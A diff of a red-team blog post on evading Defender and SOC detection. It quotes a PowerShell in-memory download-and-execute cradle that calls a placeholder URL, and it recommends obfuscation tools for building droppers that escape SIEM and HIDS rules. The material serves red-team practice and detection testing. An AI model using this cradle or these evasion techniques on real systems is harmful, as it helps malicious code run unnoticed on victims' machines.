testmactest/testmactest.github.io/_posts/2020-04-16-RedTeam-Exercises-with-OpenSource-Tools-Part-2.md

 I recommend to turn base64 off.
 It doesn't add anything to your obfuscation while trying to avoid Defender.
 It's really just used because it's the easiest way to handle sending the command in a string.
 Once you have your obfuscated code you can re-encode it if you really want to use this method. <br/>
 Most security related solutions created features for detecting base64 encoded strings and analyzing them after the content is decoded.
 CarbonBlack, FireEye made public their sollutions' capabilities in the past, being clear for us that the above arguments are using as a part of their detection rules: you can read more <a href="https://www.carbonblack.com/2015/08/14/how-to-detect-powershell-empire-with-carbon-black/" style="text-decoration: none;">here</a> and <a href="https://www.fireeye.com/blog/threat-research/2018/07/malicious-powershell-detection-via-machine-learning.html" style="text-decoration: none;">here</a>.

-<br/>Now that I identified almost all the patterns that are triggering the Microsoft's signatures, let's speak about the dropper before starting with the demo.
+<br/><br/>Now that I identified almost all the patterns that are triggering the Microsoft's signatures, let's speak about the dropper before starting with the demo.

-<b> Dropper </b><br/>
+### Dropper <br/>
 Possibly many of you use the powershell command "IEX((New-Object System.Net.WebClient).downloadstring('http://something'));" for downloading in memory your payload.
 I worked in a SOC and I know the strings like "new-object", "Webclient", "downloadstring" are used by many for detecting suspicious events.
 I will make use of an open source <a href="https://github.com/danielbohannon/Invoke-CradleCrafter" style="text-decoration: none;">tool</a> made special for this kind of tasks.<br/>
 Invoke-CradleCafter is a tool special created for automating the process for making obfuscated downloaders in memory or on disk.

-I invite you to take a look on it in case you are interested in using the downloader on disk.
 I am using the only in memory downloader.
+I invite you to take a look on it in case you are interested in using it.
+If you are a blue teamer, you may be interested in testing your detection capabilities of your SIEM/HIDS with Invoke-CradleCafter.
+<br/> I can also obfuscate more the dropper with Invoke-Obfuscation, for escaping the most exotic SIEM/HIDS rules but I am not doing it this time.

 <div>
 <center><img src="/images/2020-04-16-RedTeam-Exercises-with-OpenSource-Tools-Part-2.md/cradle.png">
  </center>